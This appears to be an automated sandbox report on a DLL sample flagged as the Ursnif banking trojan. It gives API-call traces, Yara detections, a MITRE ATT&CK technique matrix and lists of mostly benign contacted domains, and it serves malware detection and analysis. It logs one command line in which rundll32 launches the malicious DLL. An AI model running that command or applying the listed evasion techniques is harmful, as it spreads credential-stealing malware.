                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_6E237869 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_6E237869
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_6E2379EB SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_6E2379EB
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\racial.dll',#1Jump to behavior
                    Source: loaddll32.exe, 00000000.00000002.603382877.0000000001B40000.00000002.00000001.sdmp, regsvr32.exe, 00000003.00000002.605361638.0000000003340000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.604818621.0000000003570000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.607307549.0000000003580000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                    Source: loaddll32.exe, 00000000.00000002.603382877.0000000001B40000.00000002.00000001.sdmp, regsvr32.exe, 00000003.00000002.605361638.0000000003340000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.604818621.0000000003570000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.607307549.0000000003580000.00000002.00000001.sdmpBinary or memory string: Progman
                    Source: loaddll32.exe, 00000000.00000002.603382877.0000000001B40000.00000002.00000001.sdmp, regsvr32.exe, 00000003.00000002.605361638.0000000003340000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.604818621.0000000003570000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.607307549.0000000003580000.00000002.00000001.sdmpBinary or memory string: &Program Manager
                    Source: loaddll32.exe, 00000000.00000002.603382877.0000000001B40000.00000002.00000001.sdmp, regsvr32.exe, 00000003.00000002.605361638.0000000003340000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.604818621.0000000003570000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.607307549.0000000003580000.00000002.00000001.sdmpBinary or memory string: Progmanlock
                    Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E237689 cpuid 0_2_6E237689
                    Source: C:\Windows\System32\loaddll32.exeCode function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,0_2_6E1F1566
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,3_2_6E1F1566
                    Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E1F17A7 SetThreadPriority,GetSystemTime,SwitchToThread,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,0_2_6E1F17A7
                    Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E1F146C CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,0_2_6E1F146C

                    Stealing of Sensitive Information:

                    barindex
                    Yara detected UrsnifShow sources
                    Source: Yara matchFile source: 00000004.00000003.588987624.0000000002DD0000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000003.595581816.0000000002CB0000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000003.589938586.00000000006F0000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.600578000.0000000001530000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 4.2.rundll32.exe.6e1f0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.regsvr32.exe.6e1f0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.3.rundll32.exe.2dd8d03.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.loaddll32.exe.1538d03.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.rundll32.exe.6e1f0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.loaddll32.exe.6e1f0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.3.regsvr32.exe.6f8d03.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.3.rundll32.exe.2cb8d03.0.raw.unpack, type: UNPACKEDPE

                    Remote Access Functionality:

                    barindex
                    Yara detected UrsnifShow sources
                    Source: Yara matchFile source: 00000004.00000003.588987624.0000000002DD0000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000003.595581816.0000000002CB0000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000003.589938586.00000000006F0000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.600578000.0000000001530000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 4.2.rundll32.exe.6e1f0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.regsvr32.exe.6e1f0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.3.rundll32.exe.2dd8d03.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.loaddll32.exe.1538d03.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.rundll32.exe.6e1f0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.loaddll32.exe.6e1f0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.3.regsvr32.exe.6f8d03.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.3.rundll32.exe.2cb8d03.0.raw.unpack, type: UNPACKEDPE

                    Mitre Att&ck Matrix

                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    Valid AccountsNative API1DLL Side-Loading1Process Injection12Masquerading1OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                    Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsDLL Side-Loading1Process Injection12LSASS MemorySecurity Software Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Deobfuscate/Decode Files or Information1Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information2NTDSFile and Directory Discovery2Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptRegsvr321LSA SecretsSystem Information Discovery23SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaLaunchdRc.commonRc.commonRundll321Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing1DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobDLL Side-Loading1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 429206 Sample: racial.drc Startdate: 03/06/2021 Architecture: WINDOWS Score: 64 28 Found malware configuration 2->28 30 Multi AV Scanner detection for submitted file 2->30 32 Yara detected  Ursnif 2->32 7 loaddll32.exe 1 2->7         started        process3 process4 9 iexplore.exe 1 75 7->9         started        11 cmd.exe 1 7->11         started        13 regsvr32.exe 7->13         started        15 rundll32.exe 7->15         started        process5 17 iexplore.exe 148 9->17         started        20 rundll32.exe 11->20         started        dnsIp6 22 edge.gycpi.b.yahoodns.net 87.248.118.23, 443, 49741, 49742 YAHOO-DEBDE United Kingdom 17->22 24 tls13.taboola.map.fastly.net 151.101.1.44, 443, 49743, 49744 FASTLYUS United States 17->24 26 10 other IPs or domains 17->26

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    racial.dll25%VirustotalBrowse

                    Dropped Files

                    No Antivirus matches

                    Unpacked PE Files

                    SourceDetectionScannerLabelLinkDownload
                    0.2.loaddll32.exe.14c0000.0.unpack100%AviraHEUR/AGEN.1108168Download File

                    Domains

                    SourceDetectionScannerLabelLink
                    tls13.taboola.map.fastly.net0%VirustotalBrowse
                    edge.gycpi.b.yahoodns.net0%VirustotalBrowse
                    img.img-taboola.com1%VirustotalBrowse

                    URLs

                    SourceDetectionScannerLabelLink
                    https://onedrive.live.com;Fotos0%Avira URL Cloudsafe
                    https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%0%URL Reputationsafe
                    https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%0%URL Reputationsafe
                    https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%0%URL Reputationsafe
                    https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%0%URL Reputationsafe
                    https://tools.applemediaservices.com/api/badges/download-on-the-app-store/black/de-de?&quot;0%URL Reputationsafe
                    https://tools.applemediaservices.com/api/badges/download-on-the-app-store/black/de-de?&quot;0%URL Reputationsafe
                    https://tools.applemediaservices.com/api/badges/download-on-the-app-store/black/de-de?&quot;0%URL Reputationsafe
                    https://tools.applemediaservices.com/api/badges/download-on-the-app-store/black/de-de?&quot;0%URL Reputationsafe
                    https://onedrive.live.com;OneDrive-App0%Avira URL Cloudsafe
                    https://www.stroeer.com/fileadmin/com/StroeerDSP_deviceStorage.json0%URL Reputationsafe
                    https://www.stroeer.com/fileadmin/com/StroeerDSP_deviceStorage.json0%URL Reputationsafe
                    https://www.stroeer.com/fileadmin/com/StroeerDSP_deviceStorage.json0%URL Reputationsafe
                    https://mem.gfx.ms/meversion/?partner=msn&amp;market=de-ch&quot;0%URL Reputationsafe
                    https://mem.gfx.ms/meversion/?partner=msn&amp;market=de-ch&quot;0%URL Reputationsafe
                    https://mem.gfx.ms/meversion/?partner=msn&amp;market=de-ch&quot;0%URL Reputationsafe
                    https://www.stroeer.de/konvergenz-konzepte/daten-technologien/stroeer-ssp/datenschutz-ssp.html0%URL Reputationsafe
                    https://www.stroeer.de/konvergenz-konzepte/daten-technologien/stroeer-ssp/datenschutz-ssp.html0%URL Reputationsafe
                    https://www.stroeer.de/konvergenz-konzepte/daten-technologien/stroeer-ssp/datenschutz-ssp.html0%URL Reputationsafe
                    https://www.bidstack.com/privacy-policy/0%URL Reputationsafe
                    https://www.bidstack.com/privacy-policy/0%URL Reputationsafe
                    https://www.bidstack.com/privacy-policy/0%URL Reputationsafe
                    https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au0%URL Reputationsafe
                    https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au0%URL Reputationsafe
                    https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au0%URL Reputationsafe
                    http://www.wikipedia.com/0%URL Reputationsafe
                    http://www.wikipedia.com/0%URL Reputationsafe
                    http://www.wikipedia.com/0%URL Reputationsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    contextual.media.net
                    184.30.24.22
                    truefalse
                      high
                      tls13.taboola.map.fastly.net
                      151.101.1.44
                      truefalseunknown
                      hblg.media.net
                      184.30.24.22
                      truefalse
                        high
                        lg3.media.net
                        184.30.24.22
                        truefalse
                          high
                          geolocation.onetrust.com
                          104.20.184.68
                          truefalse
                            high
                            edge.gycpi.b.yahoodns.net
                            87.248.118.23
                            truefalseunknown
                            s.yimg.com
                            unknown
                            unknownfalse
                              high
                              web.vortex.data.msn.com
                              unknown
                              unknownfalse
                                high
                                www.msn.com
                                unknown
                                unknownfalse
                                  high
                                  srtb.msn.com
                                  unknown
                                  unknownfalse
                                    high
                                    img.img-taboola.com
                                    unknown
                                    unknownfalseunknown
                                    cvision.media.net
                                    unknown
                                    unknownfalse
                                      high

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://srtb.msn.com:443/notify/viewedg?rid=1d5f6324af9e451c80da6a10ac5e1596&amp;r=infopane&amp;i=1&auction[1].htm.8.drfalse
                                        high
                                        http://searchads.msn.net/.cfm?&&kp=1&~DF32BF974DC7EDD637.TMP.6.drfalse
                                          high
                                          https://contextual.media.net/medianet.php?cid=8CU157172de-ch[1].htm.8.drfalse
                                            high
                                            https://www.msn.com/de-ch/nachrichten/coronareisende-ch[1].htm.8.drfalse
                                              high
                                              https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&amp;mid=46130&amp;u1=dech_promotionalstripe_nade-ch[1].htm.8.drfalse
                                                high
                                                https://onedrive.live.com;Fotos52-478955-68ddb2ab[1].js.8.drfalse
                                                • Avira URL Cloud: safe
                                                low
                                                https://www.msn.com/de-ch/sport?ocid=StripeOCIDde-ch[1].htm.8.drfalse
                                                  high
                                                  https://www.msn.com/de-ch/nachrichten/z%c3%bcrich/26-j%c3%a4hriger-mann-stirbt-nach-sturz-auf-vorplade-ch[1].htm.8.drfalse
                                                    high
                                                    https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_TopMenu&amp;auth=1&amp;wdorigin=msnde-ch[1].htm.8.drfalse
                                                      high
                                                      https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel52-478955-68ddb2ab[1].js.8.drfalse
                                                        high
                                                        http://ogp.me/ns/fb#de-ch[1].htm.8.drfalse
                                                          high
                                                          https://www.awin1.com/cread.php?awinmid=15168&amp;awinaffid=696593&amp;clickref=de-ch-ss&amp;ued=httde-ch[1].htm.8.drfalse
                                                            high
                                                            https://outlook.live.com/mail/deeplink/compose;Kalender52-478955-68ddb2ab[1].js.8.drfalse
                                                              high
                                                              https://res-a.akamaihd.net/__media__/pics/8000/72/941/fallback1.jpg~DF32BF974DC7EDD637.TMP.6.drfalse
                                                                high
                                                                https://www.skyscanner.net/g/referrals/v1/cars/home?associateid=API_B2B_19305_00002de-ch[1].htm.8.drfalse
                                                                  high
                                                                  https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_Recent&auth=1&wdorigin=msn52-478955-68ddb2ab[1].js.8.drfalse
                                                                    high
                                                                    https://www.msn.com/de-ch/nachrichten/z%c3%bcrich/mehr-sicherheit-und-weniger-versp%c3%a4tungen-im-fde-ch[1].htm.8.drfalse
                                                                      high
                                                                      http://www.reddit.com/msapplication.xml4.6.drfalse
                                                                        high
                                                                        https://www.skype.com/de-ch[1].htm.8.drfalse
                                                                          high
                                                                          https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%auction[1].htm.8.drfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://sp.booking.com/index.html?aid=1589774&amp;label=travelnavlinkde-ch[1].htm.8.drfalse
                                                                            high
                                                                            https://www.msn.com/de-ch/nachrichten/regionalde-ch[1].htm.8.drfalse
                                                                              high
                                                                              https://onedrive.live.com/?qt=allmyphotos;Aktuelle52-478955-68ddb2ab[1].js.8.drfalse
                                                                                high
                                                                                https://amzn.to/2TTxhNgde-ch[1].htm.8.drfalse
                                                                                  high
                                                                                  https://www.skype.com/go/onedrivepromo.download?cm_mmc=MSFT_2390_MSN-com52-478955-68ddb2ab[1].js.8.drfalse
                                                                                    high
                                                                                    https://client-s.gateway.messenger.live.com52-478955-68ddb2ab[1].js.8.drfalse
                                                                                      high
                                                                                      https://www.msn.com/de-ch/de-ch[1].htm.8.drfalse
                                                                                        high
                                                                                        https://www.msn.com/de-ch/news/other/gr%c3%bcne-fordern-regierung-soll-zeitungen-f%c3%b6rdern/ar-AAKde-ch[1].htm.8.drfalse
                                                                                          high
                                                                                          https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site52-478955-68ddb2ab[1].js.8.drfalse
                                                                                            high
                                                                                            https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1~DF32BF974DC7EDD637.TMP.6.drfalse
                                                                                              high
                                                                                              https://www.awin1.com/cread.php?awinmid=15168&amp;awinaffid=696593&amp;clickref=de-ch-edge-dhp-riverde-ch[1].htm.8.drfalse
                                                                                                high
                                                                                                https://www.msn.com/de-chde-ch[1].htm.8.drfalse
                                                                                                  high
                                                                                                  https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&amp;mid=46130&amp;u1=dech_mestripe_store&amp;mde-ch[1].htm.8.drfalse
                                                                                                    high
                                                                                                    https://twitter.com/i/notifications;Ich52-478955-68ddb2ab[1].js.8.drfalse
                                                                                                      high
                                                                                                      https://www.awin1.com/cread.php?awinmid=11518&amp;awinaffid=696593&amp;clickref=dech-edge-dhp-infopade-ch[1].htm.8.drfalse
                                                                                                        high
                                                                                                        https://contextual.media.net/medianet.php?cid=8CU157172&amp;crid=722878611&amp;size=306x271&amp;httpde-ch[1].htm.8.drfalse
                                                                                                          high
                                                                                                          https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoin52-478955-68ddb2ab[1].js.8.drfalse
                                                                                                            high
                                                                                                            https://www.msn.com/de-ch/?ocid=iehp&amp;item=deferred_page%3a1&amp;ignorejs=webcore%2fmodules%2fjsbde-ch[1].htm.8.drfalse
                                                                                                              high
                                                                                                              http://www.youtube.com/msapplication.xml7.6.drfalse
                                                                                                                high
                                                                                                                http://ogp.me/ns#de-ch[1].htm.8.drfalse
                                                                                                                  high
                                                                                                                  https://onedrive.live.com/?qt=mru;OneDrive-App52-478955-68ddb2ab[1].js.8.drfalse
                                                                                                                    high
                                                                                                                    https://www.skype.com/de52-478955-68ddb2ab[1].js.8.drfalse
                                                                                                                      high
                                                                                                                      https://www.msn.com/de-ch/nachrichten/z%c3%bcrich/k%c3%b6nnen-seil-oder-hochbahnen-z%c3%bcrichs-verkde-ch[1].htm.8.drfalse
                                                                                                                        high
                                                                                                                        https://www.msn.com/de-ch/nachrichten/z%c3%bcrich/wer-bekommt-im-kanton-z%c3%bcrich-pr%c3%a4mienverbde-ch[1].htm.8.drfalse
                                                                                                                          high
                                                                                                                          https://sp.booking.com/index.html?aid=1589774&amp;label=dech-prime-hp-mede-ch[1].htm.8.drfalse
                                                                                                                            high
                                                                                                                            https://tools.applemediaservices.com/api/badges/download-on-the-app-store/black/de-de?&quot;de-ch[1].htm.8.drfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            • URL Reputation: safe
                                                                                                                            • URL Reputation: safe
                                                                                                                            • URL Reputation: safe
                                                                                                                            unknown
                                                                                                                            https://www.skype.com/de/download-skype52-478955-68ddb2ab[1].js.8.drfalse
                                                                                                                              high
                                                                                                                              https://onedrive.live.com/?wt.mc_id=oo_msn_msnhomepage_headerde-ch[1].htm.8.drfalse
                                                                                                                                high
                                                                                                                                http://www.hotmail.msn.com/pii/ReadOutlookEmail/52-478955-68ddb2ab[1].js.8.drfalse
                                                                                                                                  high
                                                                                                                                  https://onedrive.live.com;OneDrive-App52-478955-68ddb2ab[1].js.8.drfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  low
                                                                                                                                  https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&amp;mid=46130&amp;u1=dech_mestripe_office&amp;de-ch[1].htm.8.drfalse
                                                                                                                                    high
                                                                                                                                    https://clkde.tradedoubler.com/click?p=295926&amp;a=3064090&amp;g=24886692de-ch[1].htm.8.drfalse
                                                                                                                                      high
                                                                                                                                      https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location55a804ab-e5c6-4b97-9319-86263d365d28[1].json.8.drfalse
                                                                                                                                        high
                                                                                                                                        http://www.amazon.com/msapplication.xml.6.drfalse
                                                                                                                                          high
                                                                                                                                          https://www.msn.com/de-ch/nachrichten/z%c3%bcrich/eye-tracking-bei-online-pr%c3%bcfungen-keiner-%c3%de-ch[1].htm.8.drfalse
                                                                                                                                            high
                                                                                                                                            https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_QuickNote&auth=152-478955-68ddb2ab[1].js.8.drfalse
                                                                                                                                              high
                                                                                                                                              http://www.twitter.com/msapplication.xml5.6.drfalse
                                                                                                                                                high
                                                                                                                                                https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway52-478955-68ddb2ab[1].js.8.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://policies.oath.com/us/en/oath/privacy/index.htmlauction[1].htm.8.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://cdn.cookielaw.org/vendorlist/googleData.json55a804ab-e5c6-4b97-9319-86263d365d28[1].json.8.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://outlook.com/de-ch[1].htm.8.drfalse
                                                                                                                                                        high
                                                                                                                                                        https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2~DF32BF974DC7EDD637.TMP.6.drfalse
                                                                                                                                                          high
                                                                                                                                                          https://www.stroeer.com/fileadmin/com/StroeerDSP_deviceStorage.jsoniab2Data[1].json.8.drfalse
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://cdn.cookielaw.org/vendorlist/iabData.json55a804ab-e5c6-4b97-9319-86263d365d28[1].json.8.drfalse
                                                                                                                                                            high
                                                                                                                                                            https://www.msn.com/de-ch/homepage/api/pdp/updatepdpdata&quot;de-ch[1].htm.8.drfalse
                                                                                                                                                              high
                                                                                                                                                              https://cdn.cookielaw.org/vendorlist/iab2Data.json55a804ab-e5c6-4b97-9319-86263d365d28[1].json.8.drfalse
                                                                                                                                                                high
                                                                                                                                                                https://onedrive.live.com/?qt=mru;Aktuelle52-478955-68ddb2ab[1].js.8.drfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://cdn.flurry.com/adTemplates/templates/htmls/clips.html&quot;auction[1].htm.8.drfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://www.msn.com/de-ch/?ocid=iehp~DF32BF974DC7EDD637.TMP.6.drfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://sp.booking.com/index.html?aid=1589774&amp;label=dech-prime-hp-shoppingstripe-navde-ch[1].htm.8.drfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://www.ebay.ch/?mkcid=1&amp;mkrid=5222-53480-19255-0&amp;siteid=193&amp;campid=5338626668&amp;tde-ch[1].htm.8.drfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://www.msn.com/de-ch/homepage/api/modules/fetch&quot;de-ch[1].htm.8.drfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://s.yimg.com/lo/api/res/1.2/aVNxixsHCCRODLS9rj7F0g--~A/Zmk9ZmlsbDt3PTYyMjtoPTM2ODthcHBpZD1nZW1auction[1].htm.8.drfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://ir2.beap.gemini.yahoo.com/mbcsc?bv=1.0.0&amp;es=c7lj1jwGIS.anEePdYIFNznNXCUokLaxxlrEj.2NQHaPauction[1].htm.8.drfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://mem.gfx.ms/meversion/?partner=msn&amp;market=de-ch&quot;de-ch[1].htm.8.drfalse
                                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                                unknown
                                                                                                                                                                                http://www.nytimes.com/msapplication.xml3.6.drfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://web.vortex.data.msn.com/collect/v1/t.gif?name=%27Ms.Webi.PageView%27&amp;ver=%272.1%27&amp;ade-ch[1].htm.8.drfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://www.stroeer.de/konvergenz-konzepte/daten-technologien/stroeer-ssp/datenschutz-ssp.htmliab2Data[1].json.8.drfalse
                                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                                    unknown
                                                                                                                                                                                    https://www.bidstack.com/privacy-policy/iab2Data[1].json.8.drfalse
                                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                                    unknown
                                                                                                                                                                                    https://onedrive.live.com/about/en/download/52-478955-68ddb2ab[1].js.8.drfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      http://popup.taboola.com/germanauction[1].htm.8.drfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://www.msn.com/de-ch/news/other/junger-mann-stirbt-nach-sturz-von-einer-mauer-bei-der-eth/ar-AAde-ch[1].htm.8.drfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://www.ricardo.ch/?utm_source=msn&amp;utm_medium=affiliate&amp;utm_campaign=msn_mestripe_logo_dde-ch[1].htm.8.drfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://twitter.com/de-ch[1].htm.8.drfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://clkde.tradedoubler.com/click?p=245744&amp;a=3064090&amp;g=24903118&amp;epi=ch-dede-ch[1].htm.8.drfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://outlook.live.com/calendar52-478955-68ddb2ab[1].js.8.drfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auauction[1].htm.8.drfalse
                                                                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  https://onedrive.live.com/#qt=mru52-478955-68ddb2ab[1].js.8.drfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://beap.gemini.yahoo.com/mbclk?bv=1.0.0&amp;es=0o4fmhsGIS9NmqhNroEtx8G_oY6ZYs8.NC3U7cd3cZ4dcr9Yauction[1].htm.8.drfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://api.taboola.com/2.0/json/msn-ch-de-home/recommendations.notify-click?app.type=desktop&amp;apauction[1].htm.8.drfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://www.msn.com/de-ch/nachrichten/z%c3%bcrich/26-j%c3%a4hriger-erliegt-nach-sturz-von-mauer-bei-de-ch[1].htm.8.drfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://www.msn.com?form=MY01O4&OCID=MY01O4de-ch[1].htm.8.drfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://support.skype.com52-478955-68ddb2ab[1].js.8.drfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://www.skyscanner.net/flights?associateid=API_B2B_19305_00001&amp;vertical=custom&amp;pageType=de-ch[1].htm.8.drfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1~DF32BF974DC7EDD637.TMP.6.drfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  https://clk.tradedoubler.com/click?p=245744&amp;a=3064090&amp;g=21863656de-ch[1].htm.8.drfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    http://www.wikipedia.com/msapplication.xml6.6.drfalse
                                                                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                    https://contextual.media.net/medianet.php?cid=8CU157172&amp;crid=858412214&amp;size=306x271&amp;httpde-ch[1].htm.8.drfalse
                                                                                                                                                                                                                      high
